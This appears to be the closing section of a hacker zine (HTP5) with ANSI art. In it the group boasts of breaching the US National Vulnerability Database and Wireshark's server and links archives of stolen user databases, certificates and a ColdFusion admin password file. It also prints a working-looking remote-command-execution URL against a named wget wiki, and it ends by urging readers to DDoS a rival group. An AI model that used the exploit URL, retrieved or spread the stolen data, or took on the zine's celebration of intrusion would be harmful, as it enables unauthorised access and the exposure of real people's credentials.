▒▒▒▒▒▒▒░░░░░░ ░░ ░░░ ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒░░░░░░ ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒
░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░
▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░ ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░
▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░
▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░
▒▒▒▒▒▒▒░░░░▒▒░░░ ░░░░░▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒
▒▒▒░░░░░░░░▒░░░░ ░░ ░░▒▒▓▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒
▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓
▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒
▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒
▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒
▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒
▓▓▓▓▓▓▓▓▓▓▓▓▓▒░ ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒
▓▓▓▓▓▓▓▓▒▓▓▒▒░ ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒██████████████
▓▓▓▓▒▒▒▒▒▒▒░░░ ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒ ▓██████████████
▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░ ░▓██████████████
▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░ ▓▓██████████████
▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░ ▒▓███████████████
▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░ ░▓▓███████████████
▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒ ░▓▓████████████████
▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░ ▓▓█████████████████
▓▓▓███████████████▓ ░▒▓▓▓██████▓▓▓▒ ▓▓██████████████████
▓▓▓████████████████████▒ ░▒▓▓▓██▓▒ ▓▓███████████████████
▓▓▓███████████████████████▓░ ░▓▒ ▒▓▓███████████████████
▓▓▓▓███████████████████████████▒ ▓▓▓ ▒▓█████████████████████
▓██████████████████████████████▓░ ▓▓▓▓▒ ░▓▓█████████████████████
███████████████████████████████▓░ ▓▓▓▓▓░▓░ ▓▓▓█████████████████████
███████████████████████████████▓ ░▓▓▒▒▓▒▓▓▒ ▓▓▓██████████████████████
███████████████████████████████░ ▒▓▒▒░▓▓▓░ ▒▓▓███████████████████████
███████████████████████████████▒ ▓▓▒░░▓▓░ ░▓▓████████████████████████
███████████████████████████████▒ ░▒▒▒▓▓▓▓▒ ░▓▓█████████████████████████
██████████████████████████████▓▓ ░▒▓▒▓▓▓▒▒▒ ▓▓██████████████████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▄▄ ▄▄ ▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄ ▄ ▄▄▄
███▄ ██ █ █▄▄▄ █ ▄▄▄ ███▄ ██ █ █ █ █ HTP5
██ ▀█▄██ █ ▄▄▄█ █ ██ ▀█▄██ ▀▄▀ █▄▄▀
██ ▀██ ██ ▀██
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
GILL
However, we have come to believe that one 'HTP'
is involved in the NVD breach. They or perhaps
an accomplice of theirs have a disk that Mr.
Belford needs. We want you to help us find it.
\
░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░
░▒▓███████████████████▓▒░
░▒▓█████████████████████████▓▒░
░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓
░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓
░▓████▓▓▓▒▒▒▒▒▒▒░░░░ ░░░░░▒▒▓▓▓██▓
▓████▓▓▒▒▒▒▒▒░░░░ ░░▒▒▒▓▓▓██▒
▒████▓▓▓▒▒▒▒▒░░░ ░▒▒▒▓▓▓██
▓████▓▓▒▒▒▒▒▒░░░ ░░▒▒▒▓▓▓█░
█████▓▓▒▒▒▒▒░░░ ░░▒▒▒▓▓█▒
████▓▓▒▒▒▒▒▒▒▒▒░░ ░░▒▒▒▒▓▓▓▓
███▓▓▒▒▒▒▒▒▒░░░ ░░░░▒▒▒▓▓▓▓
▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░ ░▄▓▓▓▓▓▓▓▓▓█▓▓▓
▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░
▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓
░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░
▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░ ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒
░▒▒▒▒▒▒▒▒▒░░ ░░░ ░░▒ ░░▒▒▒▓
▒▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░░░░ ░░▒▓▒
░▒▒▒▒▒▒▒▒▒░ ░░░░░ ░▒░░░ ░▒▒▓
░▒▒▒▒▒▒▒▒░░░░ ░░░░▒▒▒▒░░░░░▓▓▒░░ ░░░▒▓▓
░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░
░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░ ░░▒▓▓▓▓▒▒▒▓▒▓░
▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░ ░░░░░▒▒▓▓▒▒▒▒▒▓
▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒
▓▓▓▓▓▒▒▒▒▒▒▒▓▒ ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓
▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░ ░░░░░░░▒▒▒▒▓▓▒▓▓▒
░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░ ░░▒▒▓▓▓▓▓▓▓
░ ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░ ░░▒▒▒▒▓▓▓▓▒▓
░▒ ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░ ░▒▒▒▓▓▒▓█▓▒ ░░
░██░ ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒ ░
▒████░ ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒ ▓▒░
▒▓██████▒ ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒ ▓███▓▓▒▒░░
░▒▓██████████▓ ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒ ░██████████▓▓▓▒▒░░
░▒▓███████████████▓ ░░░░▒▒▒▒▒▒▒▒░░▒░ ▒█████████████████▓▓▒
░▒▓▓████████████████████▓░ ▓▓▓▓░▓▓▓░░░ ████████████████████
██████████████████████████▓░ ▓▓▓▓▓▓░ ▒███████████████████
████████████████████████████▒ ▓▓██ ▓██████████████████
█████████████████████████████▒ ████ ░██████████████████
██████████████████████████████▒ ▀████ ▒█████████████████
███████████████████████████████▓ █████ █████████████████
████████████████████████████████▓ ██████ ▒████████████████
█████████████████████████████████▓ ███████ ▓███████████████
██████████████████████████████████▓░ ████████ ░▓██████████████
████████████████████████████████████░ ▓████████ ▒██████████████
█████████████████████████████████████░ █████████ ██████████████
██████████████████████████████████████▒ █████████ ▓█████████████
███████████████████████████████████████▒ ██████████ ░█████████████
████████████████████████████████████████▓ ▒██████████ ▓████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other
networks) and came across an individual who was pretty skilled with ColdFusion.
After due time, we invited him/her to HTP. He/she ended up manifesting the NULL
RDS 1day POC, which owned the NVD.
The NVD realized they were breached, and deleted the shells. Soon after, they
were shelled again. They deleted the shells again. Once again, they were
shelled. The DHS CSD was swift and unrelenting with their execution of the
DELETE key.
As fun as this was, the rest of HTP acknowledged what had been breached. We
switched tactics and proceeded to traverse the National Vulnerability Database
network. Two boxes down, we downloaded the CFM scripts and certificates hosted
within the NVD and NISTWEB servers. From them, we were able to authenticate
ourselves to access the DHS NIST/NVD user database (root slash period workspace
slash period garbage period).
Not knowing what to do, and realizing their DELETE key training had abandoned
them, the DHS CSD resorted to shutting the entire site down. It is our theory
their inspiration for this technique came from an NCIS episode:
http://www.youtube.com/watch?v=u8qgehH3kEQ
Included in this segment of HTP5 is the DHS NIST/NVD user database, along with
two certificates and their ColdFusion admin password.properties. Enjoy.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip
|- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
███ ███ ▄████ ▄▄████▄▄ ███ ███
███ ███ ▄█████ ▄██▀ ▀██▄ ███ ███
███ ███ ▄██▀███ ███ ███ ███ ███
██████████ ▄██▀ ███ ███ ███▄███ W
███ ███ ▄██▀ ███ ███ ████████ I
███ ███ ▄██▀ ███ ███ ███ ███ ████ R
███ ███ ▄██████████ ▀██▄ ▄██▀ ███ ████ E
███ ███ ▄██▀ ███ ▀▀████▀▀ ███ ████ S
H
A
_____ R
███████████ ███ ███ ██████████ ,-:` \;',`'- K
███ ███ ███ ███ .'-;_,; ':-;_,'.
███ ███ ███ ███ /; '/ , _`.-\
███ ██████████ ███████ | '`. (` /` ` \`|
███ ███ ███ ███ |:. `\`-. \_ / |
███ ███ ███ ███ | ( `, .`\ ;'|
███ ███ ███ ███ \ | .' `-'/
███ ███ ███ ██████████ `. ;/ .'
`'-._____.-'`
███████▄▄ ███ ▄████ ███▄ ███ ██████████ ███████████ /""-._
███ ▀██▄ ███ ▄█████ ████▄ ███ ███ ███ . '-,
███ ███ ███ ▄██▀███ █████▄ ███ ███ ███ : '',
███ ▄██▀ ███ ▄██▀ ███ ███▀██▄ ███ ███████ ███ ; * '.
███████▀▀ ███ ▄██▀ ███ ███ ▀██▄███ ███ ███ ' * () '.
███ ███ ▄██▀ ███ ███ ▀█████ ███ ███ \ \
███ ███ ▄██████████ ███ ▀████ ███ ███ \ _.---.._ '.
███ ████████ ▄██▀ ███ ███ ▀███ ██████████ ███ : .' _.--''-'' \ ,'
.._ '/.' . ;
; `-. , \'
; `, ; ._\
; \ _,-' ''--._
: \_,-' '-._
\ ,-' . '-._
.' __.-''; \...,__ '.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 0x06 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.' _,-' \ \ ''--.,__ '\
/ _,--' ; \ ; "^.}
For the final segment of HTP5, we present: Wireshark. ;_,-' ) \ )\ ) ;
/ \/ \_.,-' ;
Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget / ;
were all compromised by moinmelt.py, our RXE 0day for ,-' _,-'''-. ,-., ;
MoinMoin (included in HTP5). Hell, Wget is still ,-' _.-' \ / |/'-._...--'
shelled. Would someone please update them? It's been :--`` )/
months by now:
http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a
We had our sights set on backdooring Mercurial, which
would land us shells on UnrealIRCd (3rd time!), Firefox,
QuakeNet, Pidgin, and Debian repositories. However, we
were more interested in having fun, so instead we dropped
into Wireshark's server.
After 24 hours, Wireshark's server 'splash' returned a shell.
It featured a 3.7 kernel and an Apache httpd, which hosted
both the blog and the wiki. Permissions were read-world on
the config files, and we couldn't help ourselves. We then
proceeded to monitor Wireshark's www-data mail, as well as
download their user databases. All of the above is included
in the concluding segment of HTP5. Enjoy your corporate
security access.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip
|- 1.3MB | 31MB compressed Wireshark data
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄
█ █ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ HTP5
█ █ █ █ █ █▄▄█ █ █
█▄▄▄█ █▄▄█ █ █ ▀▄ █▄▄█
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
We've come a long way since we first showed up on the Scene. Current and past
crew of Hack The Planet, we appreciate your kickass effort that got us to this
point. Since our inception, we have unfortunately witnessed a few of our crew
members getting arrested. To them, we regret what has transpired, and wish you
all the best beyond HTP.
This zine, like all of the others, has been a blast to create. Those interested
can check out http://straylig.ht/ for past releases.
Here's to two years of HTP, everyone. Remember; relax, have fun, be the best,
and DDoS Anonymous on sight.
Hack the Planet!
Shout Outs To:
> ACiD (colored ANSI)
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
|▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
|▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
\ |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
\ ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
,` ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ / ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF